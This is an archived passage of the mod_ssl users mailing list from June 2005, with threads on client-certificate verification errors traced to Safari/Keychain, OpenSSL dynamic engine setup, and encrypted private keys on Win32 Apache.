In-Reply-To: <6A873E9C-2FF5-4337-8251-E1236C378C66@bellsouth.net>
X-Enigmail-Version: 0.89.5.0
X-Enigmail-Supports: pgp-inline, pgp-mime
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
X-Virus-Scanned: amavisd-new at werum.net
X-Spam-Status: No, hits=-5.636 tagged_above=-999 required=5 tests=ALL_TRUSTED,
 AWL, BAYES_00
X-Spam-Level: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Eckard Wille 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

lingwitt@bellsouth.net schrieb:
> browser produces errors:
> 
> [28/Jun/2005 07:20:28 05071] [info]  Connection to child 0  established 
> (server :443, client 127.0.0.1)
> [28/Jun/2005 07:20:28 05071] [info]  Seeding PRNG with 0 bytes of  entropy
> [28/Jun/2005 07:20:28 05071] [error] Certificate Verification: Error  
> (20): unable to get local issuer certificate

Hi lingwitt,

obviously the CA that signed your clients is not known to the server. 
Take a look at

http://www.modssl.org/docs/2.8/ssl_howto.html#ToC6
http://www.modssl.org/docs/2.8/ssl_reference.html#ToC14

Greetings from Germany,
Eckard
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jun 28 14:38:46 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id B6FD414D9CC; Tue, 28 Jun 2005 14:38:46 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from imf19aec.mail.bellsouth.net (imf19aec.mail.bellsouth.net [205.152.59.67])
	by master.modssl.org (Postfix) with ESMTP id 308CD14D98C
	for ; Tue, 28 Jun 2005 14:38:45 +0200 (CEST)
Received: from ibm60aec.bellsouth.net ([68.210.137.51])
          by imf19aec.mail.bellsouth.net with ESMTP
          id <20050628123845.SWXS28027.imf19aec.mail.bellsouth.net@ibm60aec.bellsouth.net>
          for ; Tue, 28 Jun 2005 08:38:45 -0400
Received: from [192.168.0.100] (really [68.210.137.51])
          by ibm60aec.bellsouth.net with ESMTP
          id <20050628123844.MQZP7767.ibm60aec.bellsouth.net@[192.168.0.100]>
          for ; Tue, 28 Jun 2005 08:38:44 -0400
Mime-Version: 1.0 (Apple Message framework v730)
In-Reply-To: <42C13F42.9070108@werum.de>
References: <6A873E9C-2FF5-4337-8251-E1236C378C66@bellsouth.net> <42C13F42.9070108@werum.de>
Content-Type: multipart/alternative; boundary=Apple-Mail-17--78798119
Message-Id: <092C2D3F-A18A-49BB-91B4-D835EE35E23F@bellsouth.net>
From: lingwitt@bellsouth.net
Subject: Re: SSLVerifyClient
Date: Tue, 28 Jun 2005 08:38:42 -0400
To: modssl-users@modssl.org
X-Mailer: Apple Mail (2.730)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: lingwitt@bellsouth.net
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


--Apple-Mail-17--78798119
Content-Transfer-Encoding: quoted-printable
Content-Type: text/plain;
	charset=ISO-8859-1;
	delsp=yes;
	format=flowed

Offensichtlich verstehe ich, da=DF alle, die Sie sagen. Arroganter =20
Dummkopf.
Erkl=E4ren Sie mir interessierendes etwas.

Das CA wird durch den Server erkannt.

Gr=FC=DFe von den US

On Jun 28, 2005, at 8:14 AM, Eckard Wille wrote:

> lingwitt@bellsouth.net schrieb:
>
>> browser produces errors:
>> [28/Jun/2005 07:20:28 05071] [info]  Connection to child 0  =20
>> established (server :443, client 127.0.0.1)
>> [28/Jun/2005 07:20:28 05071] [info]  Seeding PRNG with 0 bytes of  =20=

>> entropy
>> [28/Jun/2005 07:20:28 05071] [error] Certificate Verification: =20
>> Error  (20): unable to get local issuer certificate
>>
>
> Hi lingwitt,
>
> obviously the CA that signed your clients is not known to the =20
> server. Take a look at
>
> http://www.modssl.org/docs/2.8/ssl_howto.html#ToC6
> http://www.modssl.org/docs/2.8/ssl_reference.html#ToC14
>
> Greetings from Germany,
> Eckard


--Apple-Mail-17--78798119
Content-Transfer-Encoding: quoted-printable
Content-Type: text/html;
	charset=ISO-8859-1


Offensichtlich verstehe =
ich, da=DF alle, die Sie sagen. Arroganter Dummkopf.
Erkl=E4ren =
Sie mir interessierendes etwas.

Das CA wird durch den =
Server erkannt.

Gr=FC=DFe von den =
US

On Jun 28, 2005, at 8:14 AM, Eckard Wille =
wrote:

lingwitt@bellsouth.net =
schrieb:
 
browser produces errors:
 
[28/Jun/2005 07:20:28 05071] =
[info]=A0 Connection to =
child 0=A0 established =
(server <host>:443, client 127.0.0.1)
 
[28/Jun/2005 07:20:28 05071] =
[info]=A0 Seeding PRNG with =
0 bytes of=A0 =
entropy
 
[28/Jun/2005 07:20:28 05071] [error] Certificate =
Verification: Error=A0 =
(20): unable to get local issuer certificate
 =


 
Hi lingwitt,
 

 =

obviously the CA that signed =
your clients is not known to the server. Take a look at
 

 
http://www.mod=
ssl.org/docs/2.8/ssl_howto.html#ToC6
 
http://ww=
w.modssl.org/docs/2.8/ssl_reference.html#ToC14
 

 
Greetings from Germany,
 
Eckard
 =


=

--Apple-Mail-17--78798119--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jun 28 16:05:41 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 6BCB614D9CC; Tue, 28 Jun 2005 16:05:41 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from warthog.se (mail.warthog.se [212.247.84.253])
	by master.modssl.org (Postfix) with ESMTP id C4A0814D98C
	for ; Tue, 28 Jun 2005 16:05:40 +0200 (CEST)
Received: from p416002 [192.168.1.20]
	by warthog.se [127.0.0.1]
	with SMTP (MDaemon.PRO.v4.0.5.R)
	for ; Tue, 28 Jun 2005 16:04:41 +0200
Message-ID: <000a01c57bea$552c2f90$1401a8c0@p416002>
From: "Daniel Kimblad" 
To: 
References: <707CCA047DAAC24E9D56FA1CF0D3246C0E224E@sr-postumus.SECUDE.COM>
Subject: Re: change your autoreply configuration!!!!
Date: Tue, 28 Jun 2005 16:04:42 +0200
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_0007_01C57BFB.189FA2D0"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1506
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1506
X-MDRemoteIP: 192.168.1.20
X-Return-Path: daniel.kimblad@gizmondostudios.se
X-MDaemon-Deliver-To: modssl-users@modssl.org
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Daniel Kimblad" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_0007_01C57BFB.189FA2D0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

I'm so sorry, I had no idea that was happening. I'm using a
company mail here. The only thing I can do about it is
unsubscribe, I'll do that immediately.

/Daniel

  ----- Original Message -----=20
  From: Harald Langaker=20
  To: padraic.coyne@uk.ibm.com=20
  Cc: modssl-users@modssl.org=20
  Sent: Friday, June 24, 2005 11:26 AM
  Subject: change your autoreply configuration!!!!


  Hey!
  You autoryply "out of office" to modssl-users@modssl.org
  Can you please STOP that, I DO NOT WANT TO GET A MAIL FROM YOU EVERY =
TIME SOMEONE SENDS A MAIL TO
  modssl-users@modssl.org!!!!!!!!!!!!!!!

  Otherwise there has to be taken action to get you off the list!


  Harald Langaker=20
  Senior Quality Assurance Engineer
  Fon +49.6151.82897-46=20
  Fax +49.6151.82897-26=20

  www.secude.com=20
  mailto:langaker@secude.com=20

  SECUDE IT Security GmbH=20
  Goebelstra=DFe 21, 64293 Darmstadt, Germany=20
  CEO: Dr. Heiner Kromer=20
  SECUDE is member of iT_SEC SWiSS AG=20
  www.itsec-swiss.com=20




  =20


------=_NextPart_000_0007_01C57BFB.189FA2D0
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable









I'm so sorry, I had no idea that was =
happening. I'm=20
using a


company mail here.=20
The only thing I can do about it is


unsubscribe, I'll do that =
immediately.


 


/Daniel


 



  
----- Original Message ----- 

  From:=20
  Harald=20
  Langaker 
  
  
  
Sent: Friday, June 24, 2005 =
11:26=20
AM

  
Subject: change your autoreply=20
  configuration!!!!

  


  
Hey!

  
You =
autoryply "out=20
  of office" to modssl-users@modssl.org

  
Can =
you please=20
  STOP that, I DO NOT WANT TO GET A MAIL FROM YOU EVERY TIME SOMEONE =
SENDS A=20
  MAIL TO

  
modssl-users@modssl.org!!!!!!=
!!!!!!!!!

  
 

  
Otherwise there=20
  has to be taken action to get you off the list!

  
 

  

  

Harald Langaker 
Senior =
Quality=20
  Assurance Engineer
Fon=20
  +49.6151.82897-46 
Fax=20
  +49.6151.82897-26 

  
www.secude.com 
mailto:langaker@secude.com=
 

  
SECUDE IT Security =
GmbH=20
  
Goebelstra=DFe 21, 64293 Darmstadt, =
Germany=20
  
CEO: Dr. Heiner Kromer =

SECUDE is =
member of=20
  iT_SEC SWiSS =
AG 
www.itsec-swiss.com=20


  

  

  

  

  

  
 

  

 
=

=


  
 


------=_NextPart_000_0007_01C57BFB.189FA2D0--


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jun 28 16:28:58 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id D87E814D9CC; Tue, 28 Jun 2005 16:28:58 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mrbusi1.netcologne.de (mrbusi1.netcologne.de [194.8.194.213])
	by master.modssl.org (Postfix) with ESMTP id B1A4714D98C
	for ; Tue, 28 Jun 2005 16:28:58 +0200 (CEST)
Received: from [127.0.0.1] (unknown [195.135.135.62])
	by mrbusi1.netcologne.de (Postfix) with ESMTP id 260191A00E0
	for ; Tue, 28 Jun 2005 16:28:55 +0200 (CEST)
Message-ID: <42C15E46.1030402@uzulabs.net>
Date: Tue, 28 Jun 2005 16:27:18 +0200
From: Paul Puschmann 
User-Agent: Mozilla Thunderbird 1.0.2 (Windows/20050317)
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: SSLVerifyClient
References: <6A873E9C-2FF5-4337-8251-E1236C378C66@bellsouth.net> <42C13F42.9070108@werum.de> <092C2D3F-A18A-49BB-91B4-D835EE35E23F@bellsouth.net>
In-Reply-To: <092C2D3F-A18A-49BB-91B4-D835EE35E23F@bellsouth.net>
X-Enigmail-Version: 0.92.0.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Paul Puschmann 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

lingwitt@bellsouth.net wrote:
> Offensichtlich verstehe ich, daß alle, die Sie sagen. Arroganter Dummkopf.
> Erklären Sie mir interessierendes etwas.
> 
> Das CA wird durch den Server erkannt.
> 
> Grüße von den US
> 
Sure?
First: this is an english mailing-list, so please write only in english
and not in such a ugly german word-puzzle.

Next: Write below the quote so you don't produce TOFU (Text oben,
Fullqoute unten

Last: Read http://learn.to/quote/

I think that Eckard Wille might be right. So have some experiments with
your ca-files and certificates.

Paul
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.2 (MingW32)

iEYEARECAAYFAkLBXkUACgkQqErKtBWD7VStpQCeN0GB4nmhZcJz5EwCqdXUmno8
3rkAoOx908jbK/YpKH6GKBIs/kSeShPh
=NQne
-----END PGP SIGNATURE-----

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jun 28 17:01:42 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 095E814D9CD; Tue, 28 Jun 2005 17:01:42 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from imf16aec.mail.bellsouth.net (imf16aec.mail.bellsouth.net [205.152.59.64])
	by master.modssl.org (Postfix) with ESMTP id BCF4114D9A8
	for ; Tue, 28 Jun 2005 17:01:38 +0200 (CEST)
Received: from ibm58aec.bellsouth.net ([68.210.137.51])
          by imf16aec.mail.bellsouth.net with ESMTP
          id <20050628150137.QKPF25080.imf16aec.mail.bellsouth.net@ibm58aec.bellsouth.net>
          for ; Tue, 28 Jun 2005 11:01:37 -0400
Received: from [192.168.0.100] (really [68.210.137.51])
          by ibm58aec.bellsouth.net with ESMTP
          id <20050628150137.QSPA1856.ibm58aec.bellsouth.net@[192.168.0.100]>
          for ; Tue, 28 Jun 2005 11:01:37 -0400
Mime-Version: 1.0 (Apple Message framework v730)
In-Reply-To: <42C15E46.1030402@uzulabs.net>
References: <6A873E9C-2FF5-4337-8251-E1236C378C66@bellsouth.net> <42C13F42.9070108@werum.de> <092C2D3F-A18A-49BB-91B4-D835EE35E23F@bellsouth.net> <42C15E46.1030402@uzulabs.net>
Content-Type: multipart/alternative; boundary=Apple-Mail-19--70227880
Message-Id: <9A37C25E-6646-4AC9-823D-F3488BA52818@bellsouth.net>
From: lingwitt@bellsouth.net
Subject: Re: SSLVerifyClient
Date: Tue, 28 Jun 2005 11:01:32 -0400
To: modssl-users@modssl.org
X-Mailer: Apple Mail (2.730)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: lingwitt@bellsouth.net
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


--Apple-Mail-19--70227880
Content-Transfer-Encoding: 7bit
Content-Type: text/plain;
	charset=US-ASCII;
	delsp=yes;
	format=flowed

This can't be the problem, as I specify the CA using  
SSLCACertificatePath using the proper HASH names. I've also tried  
SSLCACertificateFile.

using s_client with SSLVerifyClient optional, it shows that the  
server is correctly identifying which CAs are allowed.

I think the problem is with Safari and Keychain. I shall look further  
into the matter.

On Jun 28, 2005, at 10:27 AM, Paul Puschmann wrote:

> I think that Eckard Wille might be right. So have some experiments  
> with
> your ca-files and certificates.


--Apple-Mail-19--70227880
Content-Transfer-Encoding: quoted-printable
Content-Type: text/html;
	charset=US-ASCII


This can't be the problem, =
as I specify the CA using SSLCACertificatePath using the proper HASH =
names. I've also tried SSLCACertificateFile.

using s_client with =
SSLVerifyClient optional, it shows that the server is correctly =
identifying which CAs are allowed.

I think the problem is with =
Safari and Keychain. I shall look further into the =
matter.

On Jun 28, 2005, at 10:27 AM, Paul Puschmann =
wrote:

I think =
that Eckard Wille might be right. So have some experiments =
with
 
your =
ca-files and certificates.
 =


=

--Apple-Mail-19--70227880--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 29 13:59:26 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id E66A314D9D6; Wed, 29 Jun 2005 13:59:26 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from web8402.mail.in.yahoo.com (web8402.mail.in.yahoo.com [202.43.219.150])
	by master.modssl.org (Postfix) with SMTP id 2C82714D98F
	for ; Wed, 29 Jun 2005 13:59:25 +0200 (CEST)
Received: (qmail 36881 invoked by uid 60001); 29 Jun 2005 11:59:24 -0000
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
  s=s1024; d=yahoo.co.in;
  h=Message-ID:Received:Date:From:Subject:To:MIME-Version:Content-Type:Content-Transfer-Encoding;
  b=XCRi8Ym/iS2i3pyFp/IOQ0MLL5KYP9HF68Yu9awA/w/HhGFiDSXgu7hQn8OcG/fB/4a9qw01r2Oa0C5muyI/5+90cWJcZHb6uuxVCCGlK/n1lYG8/B9lp7v14o4bnetDVp9SQQ1WTS4xHvjKg20E4gLndSImPQIYUnFllI3dlSo=  ;
Message-ID: <20050629115924.36879.qmail@web8402.mail.in.yahoo.com>
Received: from [202.63.105.146] by web8402.mail.in.yahoo.com via HTTP; Wed, 29 Jun 2005 04:59:23 PDT
Date: Wed, 29 Jun 2005 04:59:23 -0700 (PDT)
From: sriramamohan gadam 
Subject: problem with apache-dynamic engine support
To: modssl-users@modssl.org
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: sriramamohan gadam 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

hi ,

Currently i am working for adding engine support to
openssl.

we need to make this engine support dynamic. 

i am using openssl-0.9.7d and mod_ssl-2.8.14 and apche
1.3.27.

I had applied the patch that has been given by geoff
thorpe mod_ssl-2.8.4-1.3.20-control.diff

This is working fine in FreeBSD. But the same thing is
not working in case of linux.

If anybody can help on this that would be grate.

Thanks


Sriram


		
__________________________________ 
Discover Yahoo! 
Get on-the-go sports scores, stock quotes, news and more. Check it out! 
http://discover.yahoo.com/mobile.html
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 29 15:31:33 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 9F3E414D9D9; Wed, 29 Jun 2005 15:31:33 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from lt1.firehawksystems.com (lt1.firehawksystems.com [204.11.219.140])
	by master.modssl.org (Postfix) with ESMTP id 069E614D9D2
	for ; Wed, 29 Jun 2005 15:31:31 +0200 (CEST)
Received: from [10.0.0.2] (ppp-69-219-73-175.dsl.ipltin.ameritech.net [69.219.73.175])
	(authenticated bits=0)
	by lt1.firehawksystems.com (8.13.3/8.13.3) with ESMTP id j5TDVQlG006174
	(version=TLSv1/SSLv3 cipher=RC4-SHA bits=128 verify=NO)
	for ; Wed, 29 Jun 2005 06:31:28 -0700
X-DomainKeys: Sendmail DomainKeys Filter v0.3.0 lt1.firehawksystems.com j5TDVQlG006174
Mime-Version: 1.0 (Apple Message framework v622)
In-Reply-To: <20050629115924.36879.qmail@web8402.mail.in.yahoo.com>
References: <20050629115924.36879.qmail@web8402.mail.in.yahoo.com>
Content-Type: text/plain; charset=US-ASCII; format=flowed
Message-Id: <8802a039855f516ceecbc57a8e3db9e0@firehawksystems.com>
Content-Transfer-Encoding: 7bit
From: "Brian J. France" 
Subject: Re: problem with apache-dynamic engine support
Date: Wed, 29 Jun 2005 08:31:22 -0500
To: modssl-users@modssl.org
X-Mailer: Apple Mail (2.622)
X-Virus-Scanned: ClamAV 0.86/960/Tue Jun 28 21:31:06 2005 on lt1
X-Virus-Status: Clean
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Brian J. France" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Are you doing this?

SSLCryptoDevice dynamic
SSLCryptoDeviceCtrl SO_PATH:
SSLCryptoDeviceCtrl ID:
SSLCryptoDeviceCtrl LOAD

What errors are you getting (my guess would be a problem with SO_PATH)? 
How are you building mod_ssl (static or shared)?

Make sure you build it shared and it should work.  If you need it 
static you will need to tweak Geoff's patch to get it to work.

Of course all of my experience was on FreeBSD, not sure if the same 
problems apply to Linux.

Brian

On Jun 29, 2005, at 6:59 AM, sriramamohan gadam wrote:
> Currently i am working for adding engine support to
> openssl.
>
> we need to make this engine support dynamic.
>
> i am using openssl-0.9.7d and mod_ssl-2.8.14 and apche
> 1.3.27.
>
> I had applied the patch that has been given by geoff
> thorpe mod_ssl-2.8.4-1.3.20-control.diff
>
> This is working fine in FreeBSD. But the same thing is
> not working in case of linux.
>
> If anybody can help on this that would be grate.
>
> Thanks
>
>
> Sriram
>
>
> 		
> __________________________________
> Discover Yahoo!
> Get on-the-go sports scores, stock quotes, news and more. Check it out!
> http://discover.yahoo.com/mobile.html
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 29 15:49:36 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 72F2614D9D9; Wed, 29 Jun 2005 15:49:36 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from web51510.mail.yahoo.com (web51510.mail.yahoo.com [206.190.38.202])
	by master.modssl.org (Postfix) with SMTP id 1A06F14D9D2
	for ; Wed, 29 Jun 2005 15:49:34 +0200 (CEST)
Received: (qmail 41265 invoked by uid 60001); 29 Jun 2005 13:49:31 -0000
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
  s=s1024; d=yahoo.com;
  h=Message-ID:Received:Date:From:Subject:To:MIME-Version:Content-Type:Content-Transfer-Encoding;
  b=iQgONHLrH/pnpLaZErRWAzB4Mmsbz0VDY44u7/VTrcFQY6hZ6MKKRsxVU2rTWXqPTbYnJhEnBJRNeCbW67B1lUeCIeXGAJixYR+egHLdL27zymFttWy7Jd2yfPy1YXfy/yr2LRuCuNZnxZkxISUlgn9inQ90Gc6sSCF/G9a81Cg=  ;
Message-ID: <20050629134931.41263.qmail@web51510.mail.yahoo.com>
Received: from [199.231.49.128] by web51510.mail.yahoo.com via HTTP; Wed, 29 Jun 2005 06:49:31 PDT
Date: Wed, 29 Jun 2005 06:49:31 -0700 (PDT)
From: b h 
Subject: starting SSL with private key encrypted on W32/Apache2
To: modssl-users@modssl.org
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: b h 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi

I finished doing my development and configuration of
my server, and was just beginning to enable SSL on the
server to protect certain pages which contain
passwords.  

I have apache2 installed as a service on W32,

I have server cert in ./conf/server.crt/ and
associated private key (encrypted) in
./conf/server.key/  I figured whenever starting the
service I'd type in the password.

just to make it easy (I will figure out how to start
the server properly as a service with SSL later), I
uncommented the ifdef/endif in ssl.conf, made the
appropriate ssl configurations, and tried to start
apache.

I received this error in my error log:
[Tue Jun 28 21:16:43 2005] [error] Init:
SSLPassPhraseDialog builtin is not supported on Win32
(key file M:/www/conf/ssl.key/server.key)

is this what I think it is?  Is there no method of
starting Apache2 on W32 with an encrypted private key?
 What are the suggestions?  How can I fix this or what
am I missing (does it really mean I've messed up
something else likely)?

thanks
b


__________________________________________________
Do You Yahoo!?
Tired of spam?  Yahoo! Mail has the best spam protection around 
http://mail.yahoo.com 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 29 15:51:05 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 2EA6814D9DF; Wed, 29 Jun 2005 15:51:05 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from imf25aec.mail.bellsouth.net (imf25aec.mail.bellsouth.net [205.152.59.73])
	by master.modssl.org (Postfix) with ESMTP id A318614D9DC
	for ; Wed, 29 Jun 2005 15:50:59 +0200 (CEST)
Received: from ibm69aec.bellsouth.net ([68.210.137.144])
          by imf25aec.mail.bellsouth.net with ESMTP
          id <20050629135056.HST2565.imf25aec.mail.bellsouth.net@ibm69aec.bellsouth.net>
          for ; Wed, 29 Jun 2005 09:50:56 -0400
Received: from [192.168.0.100] (really [68.210.137.144])
          by ibm69aec.bellsouth.net with ESMTP
          id <20050629135055.BBJQ13045.ibm69aec.bellsouth.net@[192.168.0.100]>
          for ; Wed, 29 Jun 2005 09:50:55 -0400
Mime-Version: 1.0 (Apple Message framework v730)
In-Reply-To: <9A37C25E-6646-4AC9-823D-F3488BA52818@bellsouth.net>
References: <6A873E9C-2FF5-4337-8251-E1236C378C66@bellsouth.net> <42C13F42.9070108@werum.de> <092C2D3F-A18A-49BB-91B4-D835EE35E23F@bellsouth.net> <42C15E46.1030402@uzulabs.net> <9A37C25E-6646-4AC9-823D-F3488BA52818@bellsouth.net>
Content-Type: multipart/alternative; boundary=Apple-Mail-2-11933830
Message-Id: <00C4CED1-2F47-498D-8A9D-64BBD1AED230@bellsouth.net>
From: lingwitt@bellsouth.net
Subject: Re: SSLVerifyClient
Date: Wed, 29 Jun 2005 09:50:54 -0400
To: modssl-users@modssl.org
X-Mailer: Apple Mail (2.730)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: lingwitt@bellsouth.net
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


--Apple-Mail-2-11933830
Content-Transfer-Encoding: 7bit
Content-Type: text/plain;
	charset=US-ASCII;
	delsp=yes;
	format=flowed

Indeed, the trouble was with Safari and Keychain. Apparently, having  
more than one certificate confuses Safari. I am not sure what to do  
now, except get a different browser. Any advice would be appreciated.

On Jun 28, 2005, at 11:01 AM, lingwitt@bellsouth.net wrote:

> This can't be the problem, as I specify the CA using  
> SSLCACertificatePath using the proper HASH names. I've also tried  
> SSLCACertificateFile.
>
> using s_client with SSLVerifyClient optional, it shows that the  
> server is correctly identifying which CAs are allowed.
>
> I think the problem is with Safari and Keychain. I shall look  
> further into the matter.
>
> On Jun 28, 2005, at 10:27 AM, Paul Puschmann wrote:
>
>> I think that Eckard Wille might be right. So have some experiments  
>> with
>> your ca-files and certificates.
>


--Apple-Mail-2-11933830
Content-Transfer-Encoding: quoted-printable
Content-Type: text/html;
	charset=US-ASCII


Indeed, the trouble was =
with Safari and Keychain. Apparently, having more than one certificate =
confuses Safari. I am not sure what to do now, except get a different =
browser. Any advice would be appreciated.

On Jun 28, =
2005, at 11:01 AM, lingwitt@bellsouth.net =
wrote:

This can't be the problem, as I specify the CA using =
SSLCACertificatePath using the proper HASH names. I've also tried =
SSLCACertificateFile.

using s_client with =
SSLVerifyClient optional, it shows that the server is correctly =
identifying which CAs are allowed.

I think the problem is with =
Safari and Keychain. I shall look further into the =
matter.

On Jun 28, 2005, at 10:27 AM, Paul Puschmann =
wrote:

I think that Eckard Wille =
might be right. So have some experiments with
your ca-files and certificates.
 =



=

--Apple-Mail-2-11933830--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 29 22:55:30 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 5EF7B14D977; Wed, 29 Jun 2005 22:55:30 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from web51509.mail.yahoo.com (web51509.mail.yahoo.com [206.190.38.201])
	by master.modssl.org (Postfix) with SMTP id D813714D974
	for ; Wed, 29 Jun 2005 22:55:28 +0200 (CEST)
Received: (qmail 55921 invoked by uid 60001); 29 Jun 2005 20:55:24 -0000
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
  s=s1024; d=yahoo.com;
  h=Message-ID:Received:Date:From:Subject:To:In-Reply-To:MIME-Version:Content-Type:Content-Transfer-Encoding;
  b=ZXxc+HWXDHdfFjI2Vvf3Tu9uqT0eaV54jbWmwDAUBiCXi7xoEBayuWIyEiumMXN+wWC6YZykj64brlBZblnzDlbK935bGsXiUeLXuf5F7iy7qNrA5pd3aLzX3wK5gUUaqWChVUNVLD2odTaoFCFdGL1IadiQA96hFDrSU7MsMtg=  ;
Message-ID: <20050629205524.55919.qmail@web51509.mail.yahoo.com>
Received: from [199.231.48.128] by web51509.mail.yahoo.com via HTTP; Wed, 29 Jun 2005 13:55:24 PDT
Date: Wed, 29 Jun 2005 13:55:24 -0700 (PDT)
From: b h 
Subject: Re: starting SSL with private key encrypted on W32/Apache2
